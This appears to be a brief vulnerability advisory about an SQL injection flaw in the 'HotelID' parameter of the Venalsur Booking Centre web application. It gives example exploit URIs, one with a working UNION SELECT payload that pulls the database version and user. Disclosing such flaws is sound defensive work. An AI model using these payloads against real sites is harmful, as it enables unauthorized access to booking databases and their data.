Venalsur Booking Centre 'HotelID' Parameter SQL Injection Vulnerability

info
discussion
exploit
solution
references

Venalsur Booking Centre 'HotelID' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/hotel_habitaciones.php?HotelID=1+union+select+concat_ws(0x3a,@@version,0x3a,user())--

http://www.example.com/hotel.php?HotelID=[SQL]